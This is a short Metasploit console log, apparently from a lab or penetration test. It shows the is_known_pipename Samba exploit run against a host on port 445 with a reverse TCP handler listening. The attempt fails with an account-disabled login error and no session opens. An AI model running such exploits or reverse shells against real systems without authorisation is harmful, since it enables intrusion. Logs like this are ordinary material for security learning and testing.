- msf exploit(is_known_pipename) > run
- [*] Started reverse TCP handler on 192.168.2.139:4444
- [-] 192.168.2.194:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_DISABLED (Command=115 WordCount=0)
- [*] Exploit completed, but no session was created.